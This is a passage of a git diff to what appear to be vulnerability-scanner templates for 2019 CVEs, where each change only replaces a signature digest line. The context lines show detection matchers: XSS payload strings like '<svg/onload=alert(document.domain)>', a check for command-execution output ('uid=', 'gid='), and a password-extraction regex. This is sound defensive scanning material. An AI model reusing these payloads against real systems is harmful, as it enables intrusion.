4b0a004830460221009ffdd15ae860ba797293c49905eb8ca11a1df1cd725c96ce77ee90996b796b350221009e0e6d3b156d895a7f82c819d57d009c17cd48a8156301df6b087a7cd2af8da0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11370.yaml b/http/cves/2019/CVE-2019-11370.yaml index 1b7d4fccd41..1fd72adaac3 100644 --- a/http/cves/2019/CVE-2019-11370.yaml +++ b/http/cves/2019/CVE-2019-11370.yaml @@ -53,4 +53,4 @@ http: - status_code_2 == 200 - contains(body_2, 'value=\"\"><script>alert(document.domain)</script>\"></td>') condition: and -# digest: 490a0046304402201613edb17e7d184e8bfd6a67f56aa3067a996467d2f728850f7c72b8953822ad02207930871f611f818667660bbf2bed979170a0e51e2fe74d10b4aec49601099753:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220234323cc3ee7e86b644d6adbb64913a4794d70825cd64651cae335e746a6368e0220549dd4fbad2ab8f2b9e1dc799438bc40c6e4c0f971f3d8df52414f34c82eef51:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11507.yaml b/http/cves/2019/CVE-2019-11507.yaml index 722fe67cb57..95b33a4a986 100644 --- a/http/cves/2019/CVE-2019-11507.yaml +++ b/http/cves/2019/CVE-2019-11507.yaml @@ -81,4 +81,4 @@ http: - 'contains(content_type_2, "text/html")' - 'contains(body_2, "<svg/onload=alert(document.domain)>")' condition: and -# digest: 490a00463044022043f39d16f2f6886119aab715ea108001f6e8e29308f2015fa25c5a6ab42920860220156812be6290eee37d56f37e0c47ce85370b14be16a5102c5e737f8e5dbf938f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220372250627ef84867efd8c43edba94fd4fa0da5f3acd9f7e7510e4bb8c4290c9e0221009dec71523338ab332102fc06f8a048dcf273337dba0a3d52a56bcafef51ae073:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11510.yaml b/http/cves/2019/CVE-2019-11510.yaml index ee5fb4a3cee..1426741e20c 100644 --- a/http/cves/2019/CVE-2019-11510.yaml +++ b/http/cves/2019/CVE-2019-11510.yaml @@ -51,4 +51,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008d514a590bfff8d3447f980fc50ce5289cecea656e677dce97ea14305da878ab0220740c9c2e9213ec8b3647d5c72ed5fc5a6dee780bf18fcf8c1b83520108ce458e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f5167a0733051aff08414a5648a931622bcbfb0b2efb1d8bf968b007f3a1fe19022100a4bc3dd5d400192f944d0010049a6150c3c8447c8bd035a2bd8086b341381121:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11580.yaml b/http/cves/2019/CVE-2019-11580.yaml index d82849a9fd3..e003058d10e 100644 --- a/http/cves/2019/CVE-2019-11580.yaml +++ b/http/cves/2019/CVE-2019-11580.yaml @@ -57,4 +57,4 @@ http: part: body_2 words: - "CVE-2019-11580" -# digest: 4a0a0047304502203051d0a5096f77a24afc482fc6677a77fe1653eae0edc6693cc732e14e6bf0180221009a1898ec797fd72f2fd8a131e6f4b633df65ebb299f665e97dd98af7e2a67701:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022028f11643c48bc8f8bf31548411189f3f7bcf41ab906f11dc155feb33e6b544be022100c5b11884384887eae8477d353621790a9598da82b69ecc729d9c9fb7c61a8d8f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11869.yaml b/http/cves/2019/CVE-2019-11869.yaml index fe53505024a..a0f014271b2 100644 --- a/http/cves/2019/CVE-2019-11869.yaml +++ b/http/cves/2019/CVE-2019-11869.yaml @@ -57,4 +57,4 @@ http: - type: dsl dsl: - "contains(tolower(header_2), 'text/html')" -# digest: 490a00463044022077303b528fab7a1db7660e8e6e9a67d942463b812651ff73f7c1d85cea14a35702200582e13a108c5a8768789ce0fc74b32d5927f53fb88cfc5825bde0f75bd7fd3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b0bc8b2d03ef4338134f85ec3b94a9ab37b1be3aebc695749cf391003747980b022036216d92e2e31545fc3c5a5995aa1fc22985e665920ce7025e7369925c04be39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-11886.yaml b/http/cves/2019/CVE-2019-11886.yaml index a242b56c212..477f4a1c9f6 100644 --- a/http/cves/2019/CVE-2019-11886.yaml +++ b/http/cves/2019/CVE-2019-11886.yaml @@ -74,4 +74,4 @@ http: - "contains(body_2, '/wp-login.php?action=lostpassword')" - 'status_code_2 == 200' condition: and -# digest: 4a0a004730450220566f34291e7a8d09f6afce2cf6a5e12fff967848ee37e108f0a9858ee64088ab022100950e4e1f0e9e931c02c1d62fe5a21c3a201fe4dd58ef6cefd14923ce435864ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b232aeb427fd57c77158920b05b55e1d21ffc25794fedf9b5e6c9989a509ee8b022100a412fdf01c464a41c60cb15da026f2960c9eb969875a8e0622951b3a6f867920:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12461.yaml b/http/cves/2019/CVE-2019-12461.yaml index c227d4461e7..3167eef83bb 100644 --- a/http/cves/2019/CVE-2019-12461.yaml +++ b/http/cves/2019/CVE-2019-12461.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204b98e94670171718813706737dfeb47ee16ed35ad3e2d3cb357be1478f8d651f02201cbf2329749b4740a420a464b125879b9fd08020b0ff48b894a32d445136f7a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099534ae76a56ca81037ea7906df2fb7b1b5f3a8c73ac4a2c5f9d44fe5e6162f3022100a40530db99c4a079fd4b92e1edd1eaa74260bdb5186cd1274d0d137359f1130a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12581.yaml b/http/cves/2019/CVE-2019-12581.yaml index d73c2765c1e..1e5ff7a99ff 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bd1d9425ca320547cfd077360424c88c7e60b88103127f215179e55524b2051902210096939ce2f2f46d8e28a3460c693fa38886cf3e5145bd6e816abf2c793989aba2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210087eac0471b6e72904d9243b4a5324c4d1bcae75309696efd1d19a6cf28baea6602210096e243f9de7463eba96b56daf0722ef4e92c17b160a9e1ce3ac2c248372caa09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index 3d72d5a52f0..4b2395ba33b 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d8fb404a208536342549cda51948271f98fda08b130c8b87e4ec2a29708abaaf022100fdef360c217c236af9787f123e637422b91d3067f2f329afcad5ca1ea1da6191:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100946541dd8c54bf77c3a298dd741c105705d354975f3298ff8d9e81715ed663d6022051861ebbb4590dab44efd994a748563e11f8365fc3309c6d2126aed384116257:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12935.yaml b/http/cves/2019/CVE-2019-12935.yaml index 862cc222623..b88d7cd644e 100644 --- a/http/cves/2019/CVE-2019-12935.yaml +++ b/http/cves/2019/CVE-2019-12935.yaml @@ -61,4 +61,4 @@ http: - 200 - 401 condition: or -# digest: 4b0a00483046022100d2f65417b1e9027b2ca2e631046e7b64f68442d38a1e9a8a0f203f1024077c0b022100afea58a452a45800c6b61a0fb88e2bcaa17681e7fe07f340bae6e89bd1118bf8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022027618e7405a3b7d7f66ff3432c8ca32b52f8db20d394783c59b1aee1e846ae290221008227a9aadbed355aec59e8293ff5f0cd23835fb085d018d564d1617e131c01f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index e650f83f294..ecf45ae2312 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -58,4 +58,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207d76710c02ea5f938a11f81e40afa54df909c904ff90a30bf5ab7e53f9695a9c022100a241afa0f8db617118e8f9fbc2621bf4fa56d156c0dd4e4b962096b24453ac4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206efb25ec2924c4e153762b90001bc63a0b0cf4306e433a629b4aab59d8508ac7022100de88e7f1460f91389664485027f2cee37516b99afd86ef0a74e96622c6a20d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-12989.yaml b/http/cves/2019/CVE-2019-12989.yaml index 0f9031af83f..f8de9b35462 100644 --- a/http/cves/2019/CVE-2019-12989.yaml +++ b/http/cves/2019/CVE-2019-12989.yaml @@ -51,4 +51,4 @@ http: - 'contains_all(body, "status\":\"fail", "Invalid value specified") && status_code == 400' - 'contains(body, "{{md5({{num}})}}") && status_code == 400' condition: or -# digest: 4a0a004730450221008d777afa52e995272f3d92970b6dacaf49168d70d3c453514fb88e25a7ec5f46022077f355e97a79b39a324dcb97b12ff095915fd01260f9b60daf569c8d16ee6937:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e8f1aedbf97292347b1b3ccef8ce83924a7884f736b4bfa60d12a683a96aa1f5022028d1f0c990f45fc9310170deaa72ec325a951d4628e555138505b77826cfdf10:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index 1d64d95f4a3..db3fdff7e3a 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml @@ -50,4 +50,4 @@ http: part: header words: - text/html -# digest: 4b0a00483046022100b61feb760151a57f8ab8a30037fa836329db3de368279e4f7d103ae2a19b75b2022100de4195417ae02ea8b0942cabdc8eaa3a5e662b6915c525cbbb692230c3061ede:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022015e705f0ecf36b354b9f338932f6cbbede7d15a92cda003e2651d6d1c992022c022100a81fbe332d9917ce5d2ae60725edecaaf383be0f852867f5b23a5ece0aad102c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml index 49e0b5fccf6..21d8b14a763 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -60,4 +60,4 @@ http: - "idden' name='form_token' value='([a-z0-9]+)'>" internal: true part: body -# digest: 4b0a004830460221009a4f536150caa9c5bfe8712679358f8deb14b54788fe0771c4744c9eb64678e3022100c0462b5e41d3d07e3c0d09b4e6cf8dca1273110ee936daa746ef0814af37de30:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210092f6b664ba229a92ff78adc5153b38b9b664687ed766815c4501e30f72dfbdac022100907b504e5ca0786223806b41fac580fe51c24271abfdd9de9d7552045aa273ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index ae050900997..ceb6a11c943 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bfb41122ff2b9db7911afeb16a031c8d60f4f4e2532ecd2dd4cc60f9774979b702200ba0c822333932af2a7c4f85555a674077b6039ce9517c49d3de9d126db67eb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100da90a07d80c971ee8c509793ffe585a592012896837e4abcd5ec6d2e41134b6702203bfe0893d1d2a5c4dc9a235b1ffb90e53f11504b09c9c6966ba15d9c41ee8db9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14206.yaml b/http/cves/2019/CVE-2019-14206.yaml index f582961f1f7..b23e728d59d 100644 --- a/http/cves/2019/CVE-2019-14206.yaml +++ b/http/cves/2019/CVE-2019-14206.yaml @@ -161,4 +161,4 @@ http: - type: dsl dsl: - "status_code == 404" -# digest: 4a0a00473045022100bceab6f658da970ab6329fe9443701b2701898880e39b87803623ebc249b73650220394cc8ddf1ec7e5287acf66a2887ab4bcc68ba26ee1d7d10ab3e544881e37d41:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204a9ef64b961c198f409b6f8dc69a319df8ef31a860f5e702cd789a3d7dd8f35e02201c528c8a7d6c8c86447c31ddad753a2589bb23323746cd42dbf5f843aff647bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index 1897f8e9364..216ac18fe8c 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -44,4 +44,4 @@ http: part: header regex: - "(?m)^(?:Location\\s*:\\s*)(?:https?://|//|\\\\)?(?:[a-zA-Z0-9\\-_]*\\.)?interact\\.sh(?:\\s*)$" -# digest: 4b0a00483046022100c098b93e7b73fc3cf98ec73f5b0b559abd8fe37e329e98fc799870657c79ac06022100c0607ae3b42be1933ae8135c6cd5fcf78ddd9be24c30c8f993eb71fcabf95b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a5f3e7b88a9e3de4fcc419f732c31135ca52c1bd4503855427d4a3ea3fac250a022100e16503aa4145479d65b7db17deed06d99d2b09083c06676d9b36939855d5d9a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index fa456a980f5..c55275e4863 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220136c55c43dead74eddda5e66329b143f0625213da403bf7f6d0b42208c0171af0220009f530c15a661ae9d9f054265160723d2ef8a18ba341281ac43920baf5995d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203959fc7881c326907d28fa58f5bfeb84fb8a83291afe26532b5262fc6dc77deb022100deb6db30b5e6bfa152f8e5704ba9eb5ce00da3333a964856c6734446e365f64a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 167a0c3e755..5e55086259d 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220302b8dfbe0ab5ce0fcb0362c7ca60555297153d531906d432e3d301d06b065a20220594088889566e90654782485fefbcbad6b35ba063e66ffdedf495149167b3bc3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022012eae230bdd56e90ef2fd953a862bd03d2c649d624d52337c02c583cdb992446022100d3f82c111d363d42239f69109a70ad7cccd50526f331b826154344bdd51f2e05:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index c7098842341..265d2876e4c 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100904fae588da3e5685ee94fe7c92a621819ed83d90dd95287cd6221e0f187c6c6022100b549ee5c8aaf789f70e454b6f40c99c62bf1a000ab4d4e72a9322ffbb9cd6753:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203de94cb2fa4e4dd5803a84a5371187fa04587a07f59dbd9f0e9c1566326af48a022100d24542bd3996b57e19b302ce87bf6d5e047238a4ae2441edbc0de24b28f823ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index 502413ef9cb..2d68aae354d 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -70,4 +70,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205a201b29e2ec977c2771978cdc72b424a085ee43608d83cb1623be4191ab92d8022020bc096c5c72e1f1c4542678434dca70527a8835d9952689750955a2de99cc09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022015b3a3885d2e97bc237815ed88ed6d4ebb4061af283e269326536c09f1b97cfd022100f4a6d6e82a743b557c6e1e3388a6fb3a5349afcb1b46ec8b41e7f4ed16f294fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index 9000dff23db..f74ed846169 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f6c8f7e04903b1e324df5c8623ac44cda40374eb495b5b5bcbf3cfe031619b6e022100fe7e79986248e05673bf27d4a7074bb6d56b3ba62d9f93a2493b93a2bfc8da80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cdada613884736134bf605c464a30037101355161ae5c930372179e3472bccf1022100c6de3c2f27f5eb1aa17d594f256be51c0cbcb5773373a2615ad9aa4a12f8ec60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index e6bff99af63..ab9ec57e2ed 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -96,4 +96,4 @@ http: regex: - '__CSRFToken__" value="(.*?)"' internal: true -# digest: 490a004630440220380d1f91022f29b9fc3729160ec0e54dad0a1d820d39f67e9c4a03ddf2c86ded02202c3b566a600ddd1827e4d6fe67a55a7785aab49e0fb305ec8d7db9fc93b1b245:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201a303a505ad0d13aa807826e63563648ea33c62a560ac097c324d23eea0abfdf0220756d69d92a17690757372e8e07431287707f4f3b7e291ed8c322a6f8da75a8a1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 6231519dddd..655a9fffff8 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -50,4 +50,4 @@ http: - 'contains(body_2, "<svg/onload=alert(document.domain)>")' - 'contains(body_2, "Custom 404 Pro")' condition: and -# digest: 4a0a00473045022100a8cb03b758663ec7ca1297444ce42e6e57253be20882d118f9a480fecbda2e1a022030454ad395e71243a1196a7845603364e47875d901d8d590ffd06ca50d3209fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022005d152704306979ea8051087cb1cfd31f7cebeffa8bdd78a94b34e4e6c3b359a022100d8a97e1065145ba380e4726ef47605a87a197a1fdcf90f6ab7067035e382bfe4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-14950.yaml b/http/cves/2019/CVE-2019-14950.yaml index 6260c8dabc9..15a8c5b2c7c 100644 --- a/http/cves/2019/CVE-2019-14950.yaml +++ b/http/cves/2019/CVE-2019-14950.yaml @@ -61,4 +61,4 @@ http: - 'contains(content_type, "text/html")' - 'status_code == 200' condition: and -# digest: 4b0a0048304602210087d14dd414977e18041fe5daefde205ff7dd448e826b98856eeeaad5f63d663d022100b86d39421fb5993509512274b5ea11a2ee48c40d9fa9ad32361cd02c9f0ac046:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100df93c373e3a789f0584b7c1663fc8a88057aa06ca760cd6969a5474212c2588e0220143d147db7517c88392ffbe9f3e3c7003463b099a8c4e05ffb4ae2a3c9169dae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index 648d31b2376..71502fe6685 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -70,4 +70,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b5cad83a96dcf6e5ee1b02972c84634d8e8c82a8d9eb8cf4c2818528e0af6af3022100fae427449026d94ba19776f0c6bc0f67a72e8ad559eb033bbef7faa99b2fae54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bfd05e86e909559493bc7abf0a894f82e2132079fa8b7a52a9537b89337b463902207460d42cc0f17a581c0ba8a67b7d538228ad313069fb18a3dcf448274a83715f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index 266e8d8761e..a9bb4ead920 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b52f1483048a9fca13e30e6711c3178c8b09f6e0da25dfb6e0ebc30dd664ebfd0220547b82696dfb1d9fa42b2fc681419e655e68876975967c70b257ccb53e3d102f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f55f16b7e7a993062072d44a7945aba21bce0bab21619110d6261d6af2e0b31b0220651f3bb5b72b80e2c8c0b767953e211872b8f5d1dc75ceacaf34861f00c70170:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index 5e9b01cbd4f..794074ca874 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -65,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f156b23b636339976d0240822500eca7f05cf93abbae255f861866e42a23bd8602205ae194358854f6d8684585ffb6e69dd2801d9cee379e55c54cbad760d3f92d18:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f47278494ea9c0f1c927ca7f48e89ca16a4b97597867e626377fb34a989380a102207e97de094def2f693a34de056cee613489796e1e4abe683111841d86eac5171b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15774.yaml b/http/cves/2019/CVE-2019-15774.yaml index c0beca60ca5..6ce4d29b830 100644 --- a/http/cves/2019/CVE-2019-15774.yaml +++ b/http/cves/2019/CVE-2019-15774.yaml @@ -72,4 +72,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b737b0ab352d58c91031c458d702ca23e8944c384564126c3fc437ec965496ea0220161106c5ce1393b9a45eee9b191da9441d69e38e16ebb394adbb75f92620b8c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206a3319a654c957abdbd732496f13c736ab66028df682fd3fe30280326558413a0220234b93a3102e37c3a0a0e3e7e930a34fdd60e03379b92757663b48f16d16a2b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15811.yaml b/http/cves/2019/CVE-2019-15811.yaml index 0b3ca43be7a..0d33a415921 100644 --- a/http/cves/2019/CVE-2019-15811.yaml +++ b/http/cves/2019/CVE-2019-15811.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")' - 'contains(body_2, "DomainMOD")' condition: and -# digest: 4a0a00473045022100e990f7cc780767fd5d7c489d247d7ccaaeec752e196849ac9506b77fa28af1b2022007bde0d06e099d71a085faf82740a9f79aeee1668e41ab74fa2ded8e2434489b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210080655582cc2f8e1a14018081c175d0bffdc8d7f23c109e539da32758ebd453ab022100f03742e7ef8336abc67ff12e973a31586c8a4590a5c63f05370eedf00486b69c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15829.yaml b/http/cves/2019/CVE-2019-15829.yaml index 5bd379db392..17ffb0b7fb9 100644 --- a/http/cves/2019/CVE-2019-15829.yaml +++ b/http/cves/2019/CVE-2019-15829.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "<svg/onload=alert(document.domain)>")' - 'contains(body_2, "post galleries!")' condition: and -# digest: 490a0046304402201e51ba0bf28ff514e222e3845981ee2914eecf1c9f6ed3b24bca5596b19ad5ed02207da41315ed4abcf4c5ea2436d0af73948385cff41d75a877d4c4b4eb7e80fc57:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084f6647546fa0d68a654ce416abe801a2f380a94a6951328832070525042c20f0221008d6727ad0729293d50335601a9d664da3669ef6ae7fccee283a2288ab552d080:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index 100ef6e9a5c..78e98785a15 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402205167af49f0af593f8228258dae8ae3aac2bdddd15a03cc8f9544925e988cb9ec02207c7bf39d5745d0b827383f1232ba9c98bc381c08d20bfa1a79cef91d62a2933c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022012556d7b3c3dbb8bbba171027fb582df92955ac3d44314ad8c5e7825552477b3022100fa71cc2ace377275cd3388c992ee8b709edf409938a97080c4331cd5dd28132d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 8df85ae142d..acce8cdaf3c 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -46,4 +46,4 @@ http: - status_code == 200 - contains_all(body, "uid=", "gid=", "pwd&id") condition: and -# digest: 4a0a00473045022100ce0a0bbe9fc3802f6927a2e4b918fda6a3ba39f6566c0d03f18b234818b3d12502204ea2df9cbecffdf2eb17fe43fe9eb245d42c34d725e2e2631f9088691cc6f475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220754c2230e387d334f4f11169e3ecea2dd9e946564cc9dc425bb46c6e62dd0bb6022100afe07822f2888513280e755d7b100f6bdf0950080854a8b116bccef4d197daf4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml index 8bd6f73e66a..5255ca042a7 100644 --- a/http/cves/2019/CVE-2019-16123.yaml +++ b/http/cves/2019/CVE-2019-16123.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a2b545a07fd88054cc46a2d7ff28dda69c93b6765102aa7e9c2b9a5f2be01a4f022100e27a3c7d5cef1bd0d71bf396640052c719235beaa4a26ccadfe7be0b98db0b24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201556ce0d429c29a3fd817df1b345a080e264ea9a41ea41231bfe9b379f2165a0022100ea55b3ae3224d185df30133d0476423932e60243c161a689cb7c29929c0eb089:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16313.yaml b/http/cves/2019/CVE-2019-16313.yaml index c55b37db8f1..8674c64b938 100644 --- a/http/cves/2019/CVE-2019-16313.yaml +++ b/http/cves/2019/CVE-2019-16313.yaml @@ -51,4 +51,4 @@ http: regex: - '<td class="pwd" data="([a-z]+)">\*\*\*\*\*\*<\/td>' part: body -# digest: 4b0a00483046022100ad5bb20dc94f5273c982ddf1f6ae9851d58f1ebb1931b433dd8853e48b22e2cc022100a32f1384a1f08bf2ece842924a49d5793eec01b5415bdb1b8aadbcbdb06aa540:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202587a8bbfdb1fc5bd7f628b3092391fbc38c05abfed5740f84d4e44c5a69123a02200a561bd9a33cb25b2cce2ab051e1b42d9a7f3a6348c94ef948c49be11e887f32:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index ed582f39df8..f0e558395f7 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -62,4 